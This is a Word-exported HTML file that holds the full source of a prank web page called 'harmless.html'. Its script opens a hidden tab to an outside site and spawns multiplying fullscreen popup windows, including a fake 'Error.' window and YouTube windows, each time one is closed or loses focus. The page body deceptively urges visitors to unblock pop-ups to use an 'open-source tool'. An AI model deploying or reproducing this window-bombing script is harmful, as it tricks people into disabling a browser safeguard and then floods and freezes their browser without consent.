<html>

<head>
<meta http-equiv=Content-Type content="text/html; charset=utf-8">
<meta name=Generator content="Microsoft Word 15 (filtered)">
<style>
<!--
 /* Font Definitions */
 @font-face
	{font-family:"Cambria Math";
	panose-1:2 4 5 3 5 4 6 3 2 4;}
 /* Style Definitions */
 p.MsoNormal, li.MsoNormal, div.MsoNormal
	{margin:0in;
	line-height:115%;
	font-size:11.0pt;
	font-family:"Arial",sans-serif;}
.MsoChpDefault
	{font-family:"Arial",sans-serif;}
.MsoPapDefault
	{line-height:115%;}
@page WordSection1
	{size:8.5in 11.0in;
	margin:1.0in 1.0in 1.0in 1.0in;}
div.WordSection1
	{page:WordSection1;}
-->
</style>

</head>

<body lang=EN-US style='word-wrap:break-word'>

<div class=WordSection1>

<p class=MsoNormal><span lang=EN>&lt;html&gt;</span></p>

<p class=MsoNormal><span lang=EN>&lt;head&gt;</span></p>

<p class=MsoNormal><span lang=EN>            &lt;title&gt;&lt;/title&gt;</span></p>

<p class=MsoNormal><span lang=EN>            &lt;link
href=&quot;https://www.google.com/s2/favicons?domain=youtube.com&quot;
rel=&quot;icon&quot; type=&quot;image/x-icon&quot; /&gt;&lt;script&gt;</span></p>

<p class=MsoNormal><span lang=EN>    var url =
window.location.href;window.open(&quot;https://gamingfun.me/IT121R.html&quot;);//hide
our tab</span></p>

<p class=MsoNormal><span lang=EN>    var count = 1;//open one popup initially</span></p>

<p class=MsoNormal><span lang=EN>    var win = [];//array of windows</span></p>

<p class=MsoNormal><span lang=EN>    win[0] = window.open('about:blank',
'_blank', 'fullscreen = yes');//open the first window</span></p>

<p class=MsoNormal><span lang=EN>    win[0].document.body.innerHTML =
'&lt;html&gt;&lt;title&gt;Error.&lt;/title&gt;funni!!!!&lt;/html&gt;';//set the
special content of the first window</span></p>

<p class=MsoNormal><span lang=EN>    win[0].onunload = function() {//make it
spam when closed</span></p>

<p class=MsoNormal><span lang=EN>          spam();</span></p>

<p class=MsoNormal><span lang=EN>    }</span></p>

<p class=MsoNormal><span lang=EN>    win[0].blur = function() {</span></p>

<p class=MsoNormal><span lang=EN>                spam()</span></p>

<p class=MsoNormal><span lang=EN>    };</span></p>

<p class=MsoNormal><span lang=EN>    function spam() {//spam more windows!!!</span></p>

<p class=MsoNormal><span lang=EN>        count = count+1;//add 2 more windows</span></p>

<p class=MsoNormal><span lang=EN>          for (i = 0; i &lt; count; i++)
{//window creation loop</span></p>

<p class=MsoNormal><span lang=EN>              win[i] =
window.open('https://www.youtube.com/watch?v=dQw4w9WgXcQ', '_blank',
'fullscreen=yes');//create window</span></p>

<p class=MsoNormal><span lang=EN>              win[i].onunload = function()
{//spam on close</span></p>

<p class=MsoNormal><span lang=EN>                     spam();</span></p>

<p class=MsoNormal><span lang=EN>              }</span></p>

<p class=MsoNormal><span lang=EN>                          win[0].blur =
function() {</span></p>

<p class=MsoNormal><span lang=EN>                spam()</span></p>

<p class=MsoNormal><span lang=EN>    };</span></p>

<p class=MsoNormal><span lang=EN>          }</span></p>

<p class=MsoNormal><span lang=EN>    }</span></p>

<p class=MsoNormal><span lang=EN>&lt;/script&gt;&lt;script
type=&quot;text&quot;&gt;</span></p>

<p class=MsoNormal><span lang=EN>//</span></p>

<p class=MsoNormal><span lang=EN>//INFORMATION</span></p>

<p class=MsoNormal><span lang=EN>//</span></p>

<p class=MsoNormal><span lang=EN>//harmless.html</span></p>

<p class=MsoNormal><span lang=EN>//Version 2.0.5</span></p>

<p class=MsoNormal><span lang=EN>//By Droc101</span></p>

<p class=MsoNormal><span lang=EN>//12/11/19</span></p>

<p class=MsoNormal><span lang=EN>//</span></p>

<p class=MsoNormal><span lang=EN>//Based off of</span></p>

<p class=MsoNormal><span lang=EN>//Windows 93 / HYDRA</span></p>

<p class=MsoNormal><span lang=EN>//</span></p>

<p class=MsoNormal><span lang=EN>//How to get rid of it:</span></p>

<p class=MsoNormal><span lang=EN>//close the fake 'youtube' tab</span></p>

<p class=MsoNormal><span lang=EN>//close all of the popup windows</span></p>

<p class=MsoNormal><span lang=EN>//</span></p>

<p class=MsoNormal><span lang=EN>//</span></p>

<p class=MsoNormal><span lang=EN>//have fun ;)</span></p>

<p class=MsoNormal><span lang=EN>//</span></p>

<p class=MsoNormal><span lang=EN>//</span></p>

<p class=MsoNormal><span lang=EN>//</span></p>

<p class=MsoNormal><span lang=EN>&lt;/script&gt;</span></p>

<p class=MsoNormal><span lang=EN>&lt;/head&gt;</span></p>

<p class=MsoNormal><span lang=EN>&lt;body&gt;</span></p>

<p class=MsoNormal><span lang=EN>&lt;p&gt;UNBLOCK&amp;nbsp;&lt;em&gt; POP-UPS
&lt;/em&gt;&amp;nbsp; TO USE THIS AWESOME OPEN-SOURCE TOOL!!! &lt;/p&gt;</span></p>

<p class=MsoNormal><span lang=EN>&lt;/body&gt;</span></p>

<p class=MsoNormal><span lang=EN>&lt;/html&gt;</span></p>

<p class=MsoNormal><span lang=EN>&nbsp;</span></p>

<p class=MsoNormal><span lang=EN>&nbsp;</span></p>

</div>

</body>

</html>
